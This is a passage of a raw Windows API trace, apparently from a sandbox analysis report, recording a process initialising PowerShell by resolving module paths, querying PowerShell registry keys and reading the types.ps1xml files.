lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.051] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0052.051] GetLastError () returned 0x3 [0052.064] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0052.064] GetLastError () returned 0x3 [0052.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ebb0 | out: phkResult=0x14ebb0*=0x320) returned 0x0 [0052.064] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14ebf4, lpData=0x0, lpcbData=0x14ebf0*=0x0 | out: lpType=0x14ebf4*=0x2, lpData=0x0, lpcbData=0x14ebf0*=0x6c) returned 0x0 [0052.064] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14ebf4, lpData=0x3175c0, lpcbData=0x14ebf0*=0x6c | out: lpType=0x14ebf4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14ebf0*=0x6c) returned 0x0 [0052.064] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0052.064] GetLastError () returned 0x3 [0052.064] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0052.065] GetLastError () returned 0x3 [0052.065] RegCloseKey (hKey=0x320) returned 0x0 [0052.065] ExpandEnvironmentStringsW (in: 
lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3175c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0052.065] GetLastError () returned 0x3 [0052.066] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ebb0 | out: phkResult=0x14ebb0*=0x320) returned 0x0 [0052.066] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14ebf4, lpData=0x0, lpcbData=0x14ebf0*=0x0 | out: lpType=0x14ebf4*=0x0, lpData=0x0, lpcbData=0x14ebf0*=0x0) returned 0x2 [0052.066] RegCloseKey (hKey=0x320) returned 0x0 [0052.083] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3175c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0052.083] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x14e718, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0052.084] GetLastError () returned 0x3f0 [0052.085] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0052.085] GetLastError () returned 0x3f0 [0052.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.092] GetLastError () returned 0xcb [0052.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.092] GetLastError () returned 0xcb [0052.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.104] GetLastError () returned 0xcb [0052.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.104] GetLastError 
() returned 0xcb [0052.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eb30 | out: phkResult=0x14eb30*=0x328) returned 0x0 [0052.108] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb98, lpData=0x0, lpcbData=0x14eb94*=0x0 | out: lpType=0x14eb98*=0x1, lpData=0x0, lpcbData=0x14eb94*=0x74) returned 0x0 [0052.109] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb78, lpData=0x0, lpcbData=0x14eb74*=0x0 | out: lpType=0x14eb78*=0x1, lpData=0x0, lpcbData=0x14eb74*=0x74) returned 0x0 [0052.109] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb78, lpData=0x3175c0, lpcbData=0x14eb74*=0x74 | out: lpType=0x14eb78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14eb74*=0x74) returned 0x0 [0052.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e6f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0052.109] GetLastError () returned 0xcb [0052.109] SetErrorMode (uMode=0x1) returned 0x1 [0052.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14eb78 | out: lpFileInformation=0x14eb78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0052.110] GetLastError () returned 0xcb [0052.110] SetErrorMode (uMode=0x1) returned 0x1 [0052.112] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.112] GetLastError () returned 0xcb [0052.113] SetErrorMode (uMode=0x1) returned 0x1 [0052.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb6c | out: lpFileInformation=0x14eb6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0052.113] GetLastError () returned 0xcb [0052.113] SetErrorMode (uMode=0x1) returned 0x1 [0052.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.115] GetLastError () returned 0xcb [0052.115] SetErrorMode (uMode=0x1) returned 0x1 [0052.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14eb6c | out: lpFileInformation=0x14eb6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, 
nFileSizeLow=0x291b4)) returned 1 [0052.116] GetLastError () returned 0xcb [0052.116] SetErrorMode (uMode=0x1) returned 0x1 [0052.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.119] GetLastError () returned 0xcb [0052.120] GetACP () returned 0x4e4 [0052.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e57c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.149] GetLastError () returned 0x0 [0052.149] SetErrorMode (uMode=0x1) returned 0x1 [0052.151] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0052.151] GetLastError () returned 0x0 [0052.152] GetFileType (hFile=0x32c) returned 0x1 [0052.152] SetErrorMode (uMode=0x1) returned 0x1 [0052.152] GetFileType (hFile=0x32c) returned 0x1 [0052.153] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.160] GetLastError () returned 0x0 [0052.161] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.161] GetLastError () returned 0x0 [0052.161] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x1000, 
lpOverlapped=0x0) returned 1 [0052.161] GetLastError () returned 0x0 [0052.162] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0xcf3, lpOverlapped=0x0) returned 1 [0052.162] GetLastError () returned 0x0 [0052.162] ReadFile (in: hFile=0x32c, lpBuffer=0x201b5a3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201b5a3*, lpNumberOfBytesRead=0x14eae4*=0x0, lpOverlapped=0x0) returned 1 [0052.162] GetLastError () returned 0x0 [0052.162] ReadFile (in: hFile=0x32c, lpBuffer=0x201c110, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x201c110*, lpNumberOfBytesRead=0x14eae4*=0x0, lpOverlapped=0x0) returned 1 [0052.162] GetLastError () returned 0x0 [0052.163] CloseHandle (hObject=0x32c) returned 1 [0052.163] GetLastError () returned 0x0 [0052.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.164] GetLastError () returned 0x0 [0052.164] SetErrorMode (uMode=0x1) returned 0x1 [0052.164] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x202d484 | out: lpFileInformation=0x202d484*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0052.164] GetLastError () returned 0x0 
[0052.164] SetErrorMode (uMode=0x1) returned 0x1 [0052.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.165] GetLastError () returned 0x0 [0052.165] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea68 | out: phkResult=0x14ea68*=0x32c) returned 0x0 [0052.165] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x0, lpcbData=0x14eaac*=0x0 | out: lpType=0x14eab0*=0x1, lpData=0x0, lpcbData=0x14eaac*=0x56) returned 0x0 [0052.165] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x3175c0, lpcbData=0x14eaac*=0x56 | out: lpType=0x14eab0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14eaac*=0x56) returned 0x0 [0052.166] RegCloseKey (hKey=0x32c) returned 0x0 [0052.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.166] GetLastError () returned 0x0 [0052.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0052.166] GetLastError () returned 0x0 [0052.230] GetSystemInfo (in: lpSystemInfo=0x14e1e8 | out: lpSystemInfo=0x14e1e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, 
lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0052.231] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e57c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.249] GetLastError () returned 0x0 [0052.249] SetErrorMode (uMode=0x1) returned 0x1 [0052.249] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c [0052.249] GetLastError () returned 0x0 [0052.249] GetFileType (hFile=0x32c) returned 0x1 [0052.249] SetErrorMode (uMode=0x1) returned 0x1 [0052.249] GetFileType (hFile=0x32c) returned 0x1 [0052.249] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.256] GetLastError () returned 0x0 [0052.256] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.258] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, 
lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.258] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.258] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.258] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.259] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.259] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 
[0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.260] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.260] GetLastError () returned 0x0 [0052.261] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.261] GetLastError () returned 0x0 [0052.261] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, 